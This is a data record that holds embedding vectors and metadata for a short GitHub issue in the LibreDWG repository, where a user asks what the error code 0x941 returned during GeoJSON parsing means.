0.006364503409713507, 0.0038824211806058884, 0.005630992352962494, 0.006553438026458025, -0.02793268673121929, 0.01350697223097086, 0.0019597334321588278, -0.019293557852506638, -0.005542081780731678, 0.01745607703924179, 0.017544986680150032, 0.01647806167602539, -0.005582832731306553, 0.009024405851960182, -0.026895398274064064, -0.010721113532781601, 0.015707505866885185, 0.0012475241674110293, 0.015707505866885185, 0.01761907897889614, -0.006123704370111227, 0.019041646271944046, 0.0066349389962852, -0.01001723948866129, 0.006964648608118296, 0.03197810798883438, -0.011269394308328629, 0.0010317311389371753, -0.006157045718282461, -0.0000942357728490606, 0.003295241855084896, 0.015840871259570122, -0.011173074133694172, -0.009572687558829784, -0.026154477149248123, 0.026925034821033478, -0.005634697154164314, 0.0231167059391737, -0.01914537511765957, -0.03740164265036583, -0.024124357849359512, -0.013573654927313328, 0.016166875138878822, -0.008461306802928448, -0.010409926995635033, 0.012632686644792557, 0.008587263524532318, 0.01029878854751587, -0.0071943337097764015, 0.00798711832612753, -0.005175326485186815, -0.03348958492279053, 0.011039708741009235, -0.0028062346391379833, 0.0023190798237919807, 0.00827607698738575, -0.012440048158168793, 0.011951040476560593, 0.003967626951634884, 0.011387941427528858, -0.017648715525865555, 0.0015355568611994386, -0.0022635108325630426, 0.0066423481330275536, 0.012884600088000298, -0.011736174114048481, -0.01225481741130352, 0.012299273163080215, -0.012966101057827473, 0.01687815971672535, 0.033104307949543, -0.010684067383408546, 0.004552953876554966, 0.0016022396739572287, -0.0073165856301784515, -0.022034961730241776, -0.014677626080811024, -0.0017457929207012057, -0.013440289534628391, 0.0003655977488961071, -0.006916488520801067, -0.0017374575836583972, 0.022835155948996544, -0.0000318942911690101, -0.017989538609981537, 0.0010067251278087497, -0.004793752916157246, -0.011387941427528858, 0.00012954523845110089, 0.025872929021716118, -0.020271573215723038, -0.009076270274817944, -0.010209877975285053, 0.0020893944893032312, 0.020656850188970566, 0.006401549093425274, 0.026569392532110214, 0.008461306802928448, 0.0020486440043896437, 0.007246198132634163, 0.010232105851173401, 0.01591496355831623, 0.011491670273244381, 0.002500605070963502, 0.008135301992297173, -0.0010011682752519846, 0.002248692326247692, 0.0308222733438015, -0.024776367470622063, 0.015514865517616272, 0.0023431596346199512, 0.014899902045726776, 0.014707262627780437, 0.02182750403881073, 0.007668522652238607, 0.003378595458343625, 0.008690992370247841, -0.020153025165200233, -0.000922908540815115, -0.005493922159075737, 0.006549733225256205, 0.0135143818333745, 0.003300798824056983, 0.012417820282280445, -0.0160631462931633, -0.01624096743762493, -0.011913994327187538, 0.007787069771438837, -0.0029729416128247976, 0.01711525395512581, -0.006234842352569103, 0.006379321683198214, 0.007883389480412006, -0.000022560436264029704, 0.0011808413546532393, 0.027799321338534355, -0.008342759683728218, -0.009128134697675705, -0.02231651172041893, -0.011780628934502602, 0.017011525109410286, -0.007412905339151621, -0.0005070671904832125, -0.009906101040542126, -0.0010808170773088932, -0.010387699119746685, 0.016818884760141373, 0.009268909692764282, 0.0005589315551333129, 0.001768946647644043, 0.0008265889482572675, 0.018374817445874214, -0.013203195296227932, -0.0021245882380753756, 0.009809781797230244, -0.0027136197313666344, 0.011469442397356033, 0.015633413568139076, 0.016285423189401627, -0.0027803024277091026, 0.016211330890655518, -0.004323268309235573, 0.01843409053981304, 0.010054284706711769, -0.01591496355831623, 0.00410099234431982, 0.013892251066863537, -0.002854394493624568, 0.003493438009172678, -0.017426440492272377, 0.0007858383469283581, 0.019100919365882874, -0.00852058082818985, 0.001493880059570074, -0.005012324079871178, 0.001504993881098926, -0.02759186364710331, 0.0018930507358163595, -0.015885325148701668, -0.0031489101238548756, -0.02305743284523487, 0.008891040459275246, -0.040217138826847076, -0.009624551050364971, -0.002485786797478795, 0.002006041118875146, -0.042084258049726486, 0.00013209215831011534, 0.016359515488147736, 0.010283970274031162, 0.014440531842410564, 0.01112120971083641, -0.004371428396552801, 0.026984307914972305, -0.023990990594029427, -0.0024505930487066507, -0.021308861672878265, 0.004790048114955425, -0.012202952988445759, -0.0021264406386762857, -0.0047159562818706036, 0.0017735774163156748, -0.007057263515889645, 0.0052383048459887505, 0.012899418361485004, 0.016522517427802086, 0.007105423137545586, 0.01161021739244461, 0.00815012026578188, 0.0068090553395450115, -0.018834188580513, 0.01262527797371149, -0.023161161690950394, 0.008453898131847382, 0.007705568335950375, -0.029266342520713806, -0.007809297181665897, 0.008379805833101273, 0.005490217823535204, 0.009557868354022503, -0.015033267438411713, -0.018374817445874214, -0.0030285106040537357, -0.0071943337097764015, -0.00382314738817513, -0.0024005810264497995, 0.00823162216693163, 0.012306681834161282, -0.002839576220139861, 0.0074388375505805016, -0.009224454872310162, -0.02905888482928276, -0.0165521539747715, 0.004508498590439558, -0.011136027984321117, -0.0191601924598217, -0.003009987762197852, 0.00675348611548543, -0.009639370255172253, -0.02126440592110157, 0.021471863612532616, 0.01907128281891346, 0.0037786923348903656, 0.01517404243350029, 0.0036416221410036087, -0.0013845943612977862, 0.008979951031506062, -0.0020245639607310295, 0.019441742449998856, 0.0058606774546206, -0.011765810661017895, -0.0027191767003387213, 0.028125325217843056, -0.000059331487136660144, -0.008083437569439411, -0.005834745243191719, -0.0044714524410665035, 0.0051642125472426414, 0.026347117498517036, 0.002580254105851054, 0.006938716396689415, 0.020716125145554543, -0.02686576172709465, 0.03076300024986267, 0.010246924124658108, -0.01542595587670803, -0.012528957799077034, -0.011617626063525677, 0.007449951022863388, 0.009728279896080494, -0.015033267438411713, 0.03938731178641319, 0.013366198167204857, -0.003841670462861657, 0.0003454539692029357, -0.0006714587798342109, -0.004738183692097664, 0.005397602450102568, 0.00431956397369504, -0.0005436500650830567, 0.016211330890655518, -0.019441742449998856, 0.01751535013318062, 0.0014373848680406809, -0.0009604176157154143, -0.0027247334364801645, 0.004953050520271063, -0.01172876451164484, -0.014151573181152344, -0.005345738027244806, -0.017174527049064636, 0.004308450035750866, -0.012714188545942307, 0.026006294414401054, 0.0029414526652544737, -0.004597409162670374, 0.017159707844257355, -0.004023195710033178, 0.01760425977408886, -0.01818217895925045, -0.0004031068237964064, -0.007538861595094204, 0.012277045287191868, -0.004656682722270489, -0.005423534661531448, 0.0009215192985720932, -0.02619893290102482, 0.040958061814308167, 0.006786827463656664, -0.006112590432167053, -0.018789732828736305, 0.012691960670053959, 0.019901111721992493, -0.004189902916550636, 0.010372880846261978, -0.0022412831895053387, -0.00026511045871302485, 0.009794963523745537, -0.003593462286517024, 0.0036582928150892258, -0.017011525109410286, 0.006868328899145126, 0.002054200740531087, 0.002467263722792268, 0.009246681816875935, 0.007764842361211777, 0.0002074576186714694, 0.04421810805797577, -0.008994769304990768, 0.012662324123084545, 0.007494406308978796, -0.012966101057827473, 0.008616900071501732, 0.005586537066847086, 0.023072250187397003, -0.012751233763992786, 0.012751233763992786, -0.002182009629905224, 0.0037712829653173685, -0.004682614933699369, -0.008024164475500584, -0.0006603450165130198, 0.022301694378256798, 0.020834671333432198, 0.00016462316852994263, 0.03852784261107445, 0.019130555912852287, -0.024242904037237167, 0.0007737983833067119, -0.027547407895326614, 0.008505762554705143, -0.012165906839072704, 0.010558110661804676, 0.007690750062465668, 0.0119658587500453, -0.025665471330285072, -0.011565761640667915, -0.008246440440416336, 0.03535670414566994, -0.0022060894407331944, -0.01083225104957819, -0.007994526997208595, -0.018048811703920364, 0.013462517410516739, -0.011958450078964233, -0.005016028881072998, -0.012706778943538666, -0.006079249083995819, 0.005912541877478361, 0.01136571355164051, -0.037609100341796875, 0.0186711847782135, 0.009394866414368153, -0.0009474515100009739, -0.009757917374372482, 0.01607796549797058, 0.001647620927542448, 0.005175326485186815, -0.01189176645129919, 0.002407990163192153, -0.006075544282793999, 0.005838450044393539, -0.012239999137818813, 0.006142227444797754, 0.006420072168111801, -0.015574139542877674, -0.008076028898358345, 0.022672154009342194, 0.003245229832828045, 0.002143111312761903, -0.028777334839105606, -0.0020245639607310295, 0.011913994327187538, -0.014396077021956444, 0.004678910132497549, 0.014566488564014435, -0.0016994853504002094, -0.008105665445327759, 0.01249932125210762, 0.0012132566189393401, 0.012825326062738895, -0.001697633066214621, 0.006234842352569103, -0.006849805824458599, 0.0018032141961157322, 0.0015299998922273517, -0.002772893290966749, -0.01172876451164484, 0.0019375059055164456, 0.003180399304255843, -0.004560363013297319, -0.017633898183703423, -0.0013947819825261831, -0.011047118343412876, -0.011639853939414024, -0.00034105475060641766, -0.005397602450102568, 0.008513171225786209, 0.004815980326384306, -0.002993317088112235, 0.004860435612499714, 0.005545786581933498, 0.008387215435504913, 0.02619893290102482, 0.011743582785129547, -0.00940968468785286, -0.005723607260733843, -0.009128134697675705, -0.011625035665929317, -0.00803157314658165, -0.00880953948944807, 0.03067409060895443, -0.006327457260340452, 0.02233133092522621, 0.0061311135068535805, 0.005645810626447201, 0.008298304863274097, 0.0024228086695075035, -0.01664106361567974, -0.022197965532541275, 0.008216802962124348, -0.014566488564014435, -0.001224370440468192, 0.0072869486175477505, 0.007449951022863388, -0.008898450061678886, 0.018196996301412582, 0.01512958761304617, -0.009920919314026833, -0.008142711594700813, 0.014418303966522217, -0.0023376026656478643, 0.0007029479020275176, 0.0071646966971457005, -0.0067608957178890705, 0.005167917348444462, -0.005204963497817516, 0.023072250187397003, -0.002033825498074293, 0.011017480865120888, -0.01939728669822216, 0.011825083754956722, 0.0035804961808025837, -0.0026487892027944326, 0.017811717465519905, -0.025369102135300636, -0.004012082237750292, 0.006171863991767168, 0.010521064512431622, -0.014329393394291401, -0.00969864334911108, 0.024628182873129845, 0.012469684705138206, 0.00803898274898529, -0.013084648177027702, -0.009794963523745537, 0.002530242083594203, 0.010609975084662437, -0.009832008741796017, -0.004478861577808857, 0.010076512582600117, 0.0006084805936552584, 0.016981886699795723, 0.010513655841350555, -0.0028062346391379833, -0.005590241868048906, -0.010535882785916328, 0.0012910531368106604, -0.007787069771438837, 0.011536125093698502, 0.023472348228096962, 0.006801646202802658, 0.007535156793892384, 0.00021938179270364344, -0.0033748908899724483, 0.02141258865594864, -0.018048811703920364, -0.010802614502608776, 0.015248134732246399, 0.03108900599181652, 0.003863898105919361, 0.02240542322397232, -0.022286875173449516, 0.022820336744189262, 0.004682614933699369, 0.028999611735343933, 0.0273547675460577, 0.0288217905908823, -0.0236057136207819, 0.023309344425797462, 0.015796415507793427, 0.013499563559889793, -0.0041343336924910545, -0.02061239629983902, -0.01689297705888748, 0.009809781797230244, -0.006034793797880411, 0.013358788564801216, -0.000010158708391827531, 0.008698401041328907, -0.004452929366379976, -0.006827578414231539, 0.012284454889595509, 0.018389636650681496, 0.0038490795996040106, -0.0020319733303040266, -0.015766778960824013, -0.008772493340075016, -0.019100919365882874, 0.012010314501821995, -0.000796025968156755, 0.01029878854751587, 0.0011836198391392827, 0.008468716405332088, -0.020167844370007515, 0.008846585638821125, -0.003417493775486946, 0.008861403912305832, 0.00560135580599308, 0.002663607709109783, 0.018523002043366432, 0.0012049212818965316, 0.013825568370521069, 0.005393898114562035, -0.0036397697404026985, 0.010987844318151474, -0.004656682722270489, 0.024065082892775536, -0.010172832757234573, -0.007309176493436098, -0.005030847154557705, 0.006397844757884741, -0.0004880810738541186, 0.018033994361758232, -0.0010233958018943667, 0.011143437586724758, -0.006949830334633589, 0.006401549093425274, -0.018226632848381996, -0.003217445220798254, -0.018878642469644547, -0.01881936937570572, 0.03482324257493019, -0.007561089005321264, -0.0029081113170832396, 0.006449709180742502, 0.020241936668753624, -0.0030044307932257652, 0.00203753006644547, -0.01841927319765091, -0.003949103876948357, 0.006275592837482691, -0.019456559792160988, -0.001680962392129004, -0.008187166415154934, -0.0016346548218280077, -0.020567940548062325, -0.002441331511363387, -0.0062089101411402225, 0.003713861806318164, 0.010150604881346226, 0.0014809139538556337, -0.019041646271944046, 0.014988812617957592, 0.026080386713147163, 0.008253849111497402, 0.03458614647388458, 0.010987844318151474, 0.018626730889081955, 0.012551185674965382, 0.0078685712069273, 0.019738109782338142, 0.01662624627351761, 0.012151088565587997, 0.0066386437974870205, 0.023264890536665916, 0.015062904916703701, 0.018122904002666473, -0.01066924910992384, 0.0034804719034582376, -0.027725229039788246, 0.0009011439979076385, -0.0036397697404026985, -0.009076270274817944, -0.0011197153944522142, 0.009787553921341896, 0.022375784814357758, 0.010795204900205135, 0.0030599997844547033, 0.013795931823551655, 0.0396244041621685, 0.013662565499544144, -0.005849563982337713, 0.019990023225545883, -0.0077944789081811905, 0.0049011860974133015, -0.023976173251867294, 0.020390119403600693, 0.0157371424138546, 0.012299273163080215, -0.005875496193766594, -0.011543534696102142, -0.009669006802141666, 0.030214719474315643, -0.017900628969073296, 0.000746940029785037, 0.01281791739165783, -0.0015559321036562324, -0.0033267310354858637, -0.012180726043879986, -0.009713461622595787, 0.020567940548062325, 0.01921946555376053, 0.03334140405058861, -0.01078779622912407, 0.0032915372867137194, 0.021886778995394707, 0.0162261500954628, 0.013936705887317657, -0.0009669006685726345, 0.01315133087337017, 0.006949830334633589, 0.0008377027115784585, 0.016448425129055977, 0.002898849779739976, -0.019175011664628983, -0.01257341355085373, 0.014573897235095501, -0.026673121377825737, 0.013736657798290253, -0.003239672863855958, 0.019412105903029442, -0.00013440752809401602, -0.016418788582086563, -0.00929113756865263, -0.023753896355628967, -0.012751233763992786, -0.008335351012647152, 0.018078450113534927, -0.0013595883501693606, -0.0014290495309978724, -0.01575195975601673, -0.012410410679876804, 0.014848037622869015, -0.009039225056767464, 0.005634697154164314, 0.0031044550705701113, -0.002309818286448717, -0.006449709180742502, 0.0009381900308653712, -0.004771525040268898, 0.015070313587784767, -0.028747698292136192, 0.0005269793909974396, 0.010246924124658108, -0.006353389471769333, -0.01554450299590826, 0.011261984705924988, -0.003819442819803953, -0.0178561732172966, 0.013232831843197346, -0.0025209805462509394, -0.01890827901661396, -0.009387456811964512, -0.014099708758294582, 0.03621617332100868, 0.0009159623878076673, -0.0034804719034582376, 0.002991464687511325, 0.011654672212898731, 0.010358062572777271, 0.0025876632425934076, 0.015262953005731106, -0.011180483736097813, 0.007446246687322855, 0.01816735975444317, 0.004878958687186241, -0.0006589557742699981, 0.006942420732229948, 0.009513413533568382, -0.003867602674290538, 0.0021134745329618454, -0.002754370216280222, -0.0011280507314950228, 0.0019041645573452115, 0.00738326832652092, 0.005323510617017746, 0.022746246308088303, -0.014662807807326317, -0.015840871259570122, -0.000010469837434357032, -0.011528716422617435, -0.00040194913162849844, 0.022938884794712067, 0.005505036097019911, 0.005816222634166479, 0.03586053103208542, -0.019278740510344505, 0.00840203370898962, 0.011284212581813335, -0.003576791612431407, -0.004215835127979517, 0.002711767330765724, 0.0071165370754897594, 0.007016513030976057, 0.008424260653555393, 0.006712735630571842, -0.017633898183703423, -0.0018874938832595944, 0.002567288000136614, 0.023353800177574158, 0.0020190072245895863, 0.009543050080537796, -0.0135143818333745, 0.009550459682941437, -0.00460852263495326, -0.0021357019431889057, 0.01825626939535141, -0.006935011595487595, 0.00675348611548543, -0.02645084634423256, -0.011521306820213795, -0.013603292405605316, 0.02645084634423256, -0.010291379876434803, -0.009787553921341896, 0.02126440592110157, -0.0173671655356884, 0.006942420732229948, 0.00560135580599308, -0.019945567473769188, -0.03159283101558685, 0.013981161639094353, 0.0023783533833920956, 0.01590014435350895, -0.013944115489721298, 0.0037731353659182787, -0.009743099100887775, 0.00009122578194364905, 0.010358062572777271, -0.008550217375159264, -0.01827108860015869, -0.03018508292734623, 0.0008052875055000186, 0.0074388375505805016, -0.026110023260116577, -0.0037601692602038383, -0.016374332830309868, -0.003669406520202756, -0.012158498167991638, -0.015633413568139076, 0.014099708758294582, 0.01841927319765091, -0.0038527841679751873, -0.02133849821984768, -0.017322711646556854, -0.003298946423456073, -0.009298546239733696, -0.011647263541817665, -0.021308861672878265, -0.013010555878281593, 0.011691718362271786, -0.0038601935375481844, -0.010409926995635033, 0.0199752040207386, -0.0031007505021989346, 0.007490701973438263, 0.014314575120806694, 0.021797867491841316, 0.0017420882359147072, -0.0283327829092741, -0.006279297638684511, 0.0027414041105657816, -0.0119658587500453, -0.008913268335163593, 0.010283970274031162, -0.004734479356557131, -0.017885809764266014, -0.003026658436283469, 0.002232021652162075, -0.00958009622991085, -0.03458614647388458, 0.00034892704570665956, -0.0027691887225955725, -0.0226276982575655, 0.026584211736917496, -0.00888363178819418, -0.015151815488934517, -0.0018411863129585981, 0.038261111825704575, 0.0043936558067798615, -0.005049370229244232, -0.022924065589904785, -0.005434648599475622, 0.015870507806539536, 0.009439321234822273, -0.016922613605856895, 0.019827021285891533, 0.005919951014220715, 0.00832053180783987, 0.011261984705924988, 0.00005423766197054647, -0.0022820336744189262, 0.010417335666716099, 0.003841670462861657, -0.0008687287918291986, -0.013084648177027702, 0.00777225149795413, -0.010676657781004906, 0.008431670255959034, 0.030377721413969994, 0.015033267438411713, 0.005190144758671522, -0.00982460007071495, 0.0059607019647955894, -0.005075302440673113, -0.005045665428042412, -0.012262227013707161, -0.0006770156905986369, 0.024124357849359512, -0.004656682722270489, -0.010491427965462208, 0.033074669539928436, 0.001008577411994338, 0.005245713982731104, -0.015003630891442299, 0.0012317795772105455, 0.0236057136207819, -0.003047033678740263, -0.02028639055788517, -0.02304261364042759, -0.004149152431637049, 0.007542565930634737, -0.005104938987642527, -0.0033434017095714808, -0.002913668053224683, 0.0196492001414299, 0.022494332864880562, -0.012536367401480675, -0.005805108696222305, 0.005386488977819681, -0.0076240673661231995, -0.003454539692029357, 0.008076028898358345, -0.0037286800798028708, -0.0026858351193368435, 0.02191641554236412, 0.004063946660608053, -0.030792636796832085, -0.016937432810664177, 0.0030618521850556135, -0.012662324123084545, 0.004356610123068094, -0.000796025968156755, 0.00953564140945673, 0.0070239221677184105, 0.02840687520802021, 0.007427723612636328, -0.0016624393174424767, 0.014173801057040691, 0.013292105868458748, 0.006175568792968988, 0.004530726000666618, -0.008742856793105602, 0.024731911718845367, 0.009557868354022503, 0.006690508220344782, -0.009869054891169071, -0.007572202943265438, -0.0021042129956185818, 0.022849975153803825, 0.029177431017160416, 0.0073647452518343925, -0.003208183916285634, -0.017915446311235428, 0.03384522721171379, -0.015381500124931335, -0.0016133533790707588, 0.006534914951771498, 0.006597892846912146, -0.008861403912305832, -0.00070248480187729, 0.0006793310749344528, -0.0009238346829079092, -0.0004396897566039115, 0.00101969123352319, -0.003767578396946192, 0.014033026061952114, -0.007601839955896139, 0.0024654115550220013, -0.00026534197968430817, 0.01566305011510849, 0.01310687605291605, 0.02255360595881939, 0.022864792495965958, -0.028851427137851715, -0.005605060141533613, -0.029088521376252174, 0.009550459682941437, 0.016611427068710327, -0.010135786607861519, 0.00940968468785286, 0.017826536670327187, -0.0027654841542243958, -0.010217287577688694, 0.01399597991257906, 0.014447941444814205, 0.011736174114048481, 0.008172348141670227, 0.01411452703177929, 0.016774430871009827, -0.011328667402267456, 0.0013253208016976714, 0.010032057762145996, 0.013299514539539814, -0.004664091859012842, 0.0017735774163156748, -0.026732396334409714, -0.00777225149795413, 0.004286222625523806, 0.004512202925980091, -0.001989370444789529, 0.007449951022863388, 0.017411621287465096, -0.012684551067650318, 0.006557142361998558, 0.007131355348974466, 0.006294115912169218, 0.0117213549092412, -0.0009465253679081798, -0.014418303966522217, 0.005508740432560444, 0.010261742398142815, 0.010617384687066078, -0.006216319277882576, 0.021368134766817093, -0.003797215176746249, 0.009476367384195328, 0.021205132827162743, 0.019041646271944046, 0.012825326062738895, 0.010328425094485283, -0.007846343331038952, 0.004397360607981682, 0.03710527718067169, -0.029014429077506065, -0.02668794058263302, -0.007979708723723888, -0.024939369410276413, -0.009128134697675705, -0.005123462062329054, -0.006216319277882576, -0.017574623227119446, -0.0013901512138545513, 0.01744125783443451, 0.018774913623929024, 0.003724975511431694, 0.0015475967666134238, -0.002131997374817729, 0.013121694326400757, 0.009179999120533466, -0.007779660634696484, -0.011713946238160133, -0.002370944246649742, -0.009750507771968842, 0.008483534678816795, 0.02896997332572937, 0.0119658587500453, 0.00981719046831131, -0.009920919314026833, 0.019175011664628983, 0.018463727086782455, -0.04338827729225159, 0.02378353290259838, 0.023398255929350853, -0.004482566379010677, 0.0035897577181458473, 0.00904663372784853, 0.019293557852506638, 0.0239317175000906, 0.005019733216613531, 0.0011817674385383725, 0.015485228970646858, -0.01858227513730526, -0.006501573603600264, -0.03467505797743797, -0.006483050528913736, -0.004990096669644117, -0.021234769374132156, -0.013477335684001446, 0.0010900786146521568, -0.02547283098101616, -0.021486680954694748, 0.010120968334376812, -0.005890314467251301, 0.03141501173377037, -0.001036361907608807, -0.020167844370007515, 0.003830556757748127, -0.01238077413290739, 0.014047844335436821, 0.002600629348307848, 0.02012338861823082, 0.0012197396717965603, -0.006453413516283035, 0.005323510617017746, -0.04673723876476288, -0.01671515591442585, 0.0026543461717665195, 0.007442541886121035, -0.016196511685848236, -0.012691960670053959, -0.01566305011510849, 0.008209394291043282, -0.012239999137818813, -0.008868812583386898, -0.022049780935049057, -0.0032137406524270773, -0.023827988654375076, 0.01899719052016735, 0.006268183700740337, -0.015018449164927006, 0.00015779281966388226, 0.005716198123991489, 0.007294357754290104, -0.00010268689220538363, 0.0008969763293862343, -0.00863912794739008, -0.008001936599612236, 0.007638885639607906, -0.024539271369576454, -0.020167844370007515, -0.009350410662591457, -0.014751718379557133, -0.003454539692029357, 0.01914537511765957, -0.0028229053132236004, 0.01711525395512581, 0.025665471330285072, -0.009713461622595787, 0.003630508203059435, 0.020256754010915756, -0.01274382509291172, -0.0011558352271094918, 0.00422324426472187, 0.0043010408990085125, 0.005156803410500288, 0.0001620762632228434, 0.00738697312772274, -0.02427254058420658, 0.002148668048903346, -0.0005181809538044035, -0.011091573163866997, 0.014818401075899601, -0.02044939436018467, 0.0033267310354858637, 0.002876622136682272, 0.006571961101144552, -0.036482904106378555, 0.003975036088377237, 0.009735689498484135, 0.011491670273244381, -0.009661597199738026, 0.010402517393231392, 0.00560135580599308, -0.010032057762145996, -0.017411621287465096, 0.01630024053156376, -0.025280192494392395, -0.0007219339604489505, 0.008557626977562904, -0.02167932130396366, -0.015485228970646858, 0.00444181589409709, 0.016996705904603004, 0.00020340571063570678, 0.0060384985990822315, -0.002993317088112235, 0.005668038502335548, 0.00028919035685248673, 0.009802372194826603, -0.018152540549635887, 0.009305955842137337, -0.009357820264995098, -0.010409926995635033, 0.009431912563741207, 0.007609249092638493, -0.004489975515753031, 0.006190387066453695, -0.0030822274275124073, 0.014655398204922676, 0.013907069340348244, 0.008350169286131859, -0.0006283927941694856, -0.0013077239273115993, -0.003647178877145052, -0.03464542329311371, -0.005853268317878246, 0.002997021656483412, -0.006149636581540108, 0.05450207740068436, -0.02987389639019966, -0.010558110661804676, 0.0013716282555833459, -0.018641548231244087, -0.004964164458215237, 0.018567455932497978, 0.007668522652238607, 0.0038379658944904804, -0.001592978136613965, -0.0008969763293862343, 0.0008256628061644733, -0.012314091436564922, -0.007498111110180616, 0.0018698970088735223, -0.005690265912562609, -0.0027025057934224606, 0.01460353471338749, -0.01112120971083641, -0.00020166917238384485, -0.0078685712069273, -0.018078450113534927, -0.027206584811210632, 0.007898207753896713, 0.014662807807326317, 0.014292348176240921, 0.0025561742950230837, 0.0052864644676446915, -0.004541839938610792, -0.0196492001414299, 0.0033526632469147444, 0.028421692550182343, 0.001983813475817442, 0.00880953948944807, 0.01363292895257473, 0.00840203370898962, -0.0162261500954628, 0.011417577974498272, 0.009676415473222733, -0.007338813040405512, -0.004293631762266159, -0.01469244435429573, 0.00393428560346365, -0.00046608500997535884, 0.006671985145658255, -0.00815752986818552, 0.006864624097943306, -0.002522832714021206, 9.731811587698758e-7, 0.0011502783745527267, 0.00014992053911555558, -0.005075302440673113, -0.00945413950830698, 0.019752928987145424, -0.0029507142025977373, -0.015692686662077904, 0.020078932866454124, 0.009357820264995098, 0.017989538609981537, -0.010239515453577042, 0.006427481304854155, -0.016107602044939995, -0.005586537066847086, 0.006805350538343191, -0.013499563559889793, -0.01501104049384594, 0.007927844300866127, 0.018700821325182915, 0.0005663407500833273, -0.0020190072245895863, -0.009231863543391228, -0.008209394291043282, -0.030407359823584557, 0.0035249271895736456, -0.0038379658944904804, -0.015070313587784767, -0.0026321185287088156, -0.016166875138878822, -0.016018692404031754, 0.012269635684788227, -0.0006969279493205249, -0.004245471674948931, -0.0036805204581469297, -0.010558110661804676, -0.009283727966248989, -0.005371670238673687, -0.0067608957178890705, 0.0020690192468464375, 0.008979951031506062, -0.008409442380070686, 0.028747698292136192, -0.005097529850900173, 0.0016957807820290327, 0.011669490486383438, -0.004693728405982256, 0.01362551935017109, 0.011291621252894402, -0.0047307745553553104, 0.012647504918277264, 0.010232105851173401, -0.0012938316212967038, 0.004627045709639788, -0.00798711832612753, 0.0006404327577911317, -0.004371428396552801, 0.008187166415154934, 0.009624551050364971, -0.01006169430911541, 0.00027506655897013843, -0.007205447647720575, 0.0026210045907646418, 0.025428377091884613, 0.0016402117908000946, -0.0062089101411402225, -0.0015976089052855968, -0.021886778995394707, 0.008468716405332088, -0.011995495297014713, -0.004941936582326889, 0.0001612658816156909, -0.0004514981701504439, 0.014559078961610794, -0.00024149363161996007, -0.009780144318938255, 0.0017281960463151336, -0.010847069323062897, 0.013529200106859207, -0.015003630891442299, 0.0036193944979459047, 0.0344083271920681, 0.0031766947358846664, -0.017100434750318527, -0.0157371424138546, -0.008698401041328907, 0.005390193313360214, 0.0070239221677184105, 0.005442057736217976, 0.017411621287465096, 0.004893776960670948, 0.005227190908044577, 0.00929113756865263, 0.019189829006791115, -0.01208440586924553, -0.025295009836554527, -0.007557384669780731, -0.004004673101007938, -0.0002611743111629039, -0.0014133050572127104, -0.024005809798836708, -0.019382469356060028, 0.010224697180092335, 0.015248134732246399, 0.017248619347810745, -0.004089878872036934, -0.01274382509291172, 0.013603292405605316, 0.0091725904494524, 0.0014679478481411934, -0.003637917572632432, 0.01843409053981304, -0.0175301693379879, -0.011743582785129547, -0.016759611666202545, -0.000980792916379869, 0.005994043312966824, -0.010343244299292564, 0.024894913658499718, -0.011817675083875656, -0.00028247578302398324, -0.0015605628723278642, 0.035267796367406845, -0.0063496846705675125, 0.008239030838012695, 0.007890798151493073, 0.025621015578508377, 0.0010317311389371753, 0.010580338537693024, 0.004664091859012842, -0.00044223666191101074, 0.011951040476560593, 0.004049127921462059, -0.022761063650250435, -0.02920706942677498, 0.00777225149795413, 0.009520823135972023, -0.00533462455496192, -0.008787311613559723, -0.005890314467251301, 0.0015976089052855968, -0.011454624123871326, -0.005019733216613531, 0.015944600105285645, 0.011513897217810154, -0.00047928266576491296, -0.010217287577688694, -0.0005806960980407894, -0.0016300241695716977, -0.0052383048459887505, 0.007779660634696484, -0.018315544351935387, 0.003361924784258008, -0.0019023122731596231, -0.002776597859337926, 0.0186711847782135 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
geojson parsing, return error code "0x941", what is the meaning of this code?
error code 0x941
https://api.github.com/repos/LibreDWG/libredwg/issues/919/comments
11
2024-01-09T02:52:49
2024-01-11T10:21:20Z
https://github.com/LibreDWG/libredwg/issues/919
2,071,536,689
919
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : error code 0x941 Issue date: --- start body --- geojson parsing, return error code "0x941", what is the meaning of this code? --- end body ---
204
[ -0.03459795191884041, 0.03314824029803276, 0.001320771872997284, 0.014985010959208012, 0.019598999992012978, 0.02287479303777218, 0.030220933258533478, 0.04965266212821007, -0.01395348459482193, -0.0013913408620283008, 0.004073832184076309, -0.019682638347148895, 0.004843992181122303, -0.018665051087737083, 0.011109817773103714, 0.010252535343170166, -0.030025780200958252, -0.0013338401913642883, 0.012294678948819637, -0.008956157602369785, -0.011270122602581978, 0.044439271092414856, 0.0647910088300705, 0.034319158643484116, -0.004328228998929262, 0.016072295606136322, 0.0032531414180994034, -0.0009060704614967108, -0.01699230633676052, -0.0007087387493811548, -0.003035336034372449, -0.013695603236556053, 0.04901144281029701, -0.018874144181609154, 0.043993204832077026, -0.01600259728729725, 0.04789627715945244, 0.08631366491317749, -0.031252458691596985, 0.032562777400016785, -0.008788883686065674, -0.04031316563487053, 0.015319560654461384, 0.04792415723204613, -0.006196127738803625, -0.01161861140280962, -0.018888084217905998, 0.004032013472169638, -0.0320051945745945, -0.0053423307836055756, 0.003951861057430506, 0.00795948039740324, -0.03574099391698837, -0.018191106617450714, 0.01218316238373518, -0.05344421789050102, 0.031224582344293594, 0.04864901304244995, -0.015612291172146797, -0.001890550833195448, -0.017814738675951958, 0.026108767837285995, -0.016713514924049377, -0.00458959536626935, -0.04159560427069664, 0.04396532475948334, -0.008391606621444225, 0.046279288828372955, -0.008461304008960724, 0.00258055841550231, 0.020755982026457787, 0.002101386431604624, 0.0180935300886631, 0.027753634378314018, 0.017062002792954445, -0.012329528108239174, 0.004331713542342186, 0.004690656904131174, 0.013779240660369396, -0.009234949015080929, -0.007771296426653862, 0.01775898039340973, -0.013423781841993332, -0.0327858105301857, -0.01909717731177807, 0.013709542341530323, -0.017117761075496674, -0.06256067752838135, -0.009681014344096184, 0.0110819386318326, 0.010824057273566723, 0.03220035135746002, -0.025593005120754242, -0.01775898039340973, 0.054252710193395615, -0.036047663539648056, -0.0021536597050726414, -0.01523592323064804, -0.03805495798587799, -0.029384560883045197, -0.02716817334294319, 0.014455308206379414, -0.004227166995406151, -0.005655970424413681, 0.03178216144442558, 0.03353854641318321, 0.04658596217632294, 0.006816437467932701, 0.012684985995292664, 0.07198381423950195, 0.03551796078681946, -0.012078615836799145, -0.007130077574402094, -0.018706869333982468, -0.016713514924049377, 0.011716187931597233, 0.015612291172146797, -0.01437167078256607, -0.02339055761694908, 0.02882697992026806, -0.03794344142079353, -0.05093509703874588, -0.008426454849541187, -0.05015448480844498, 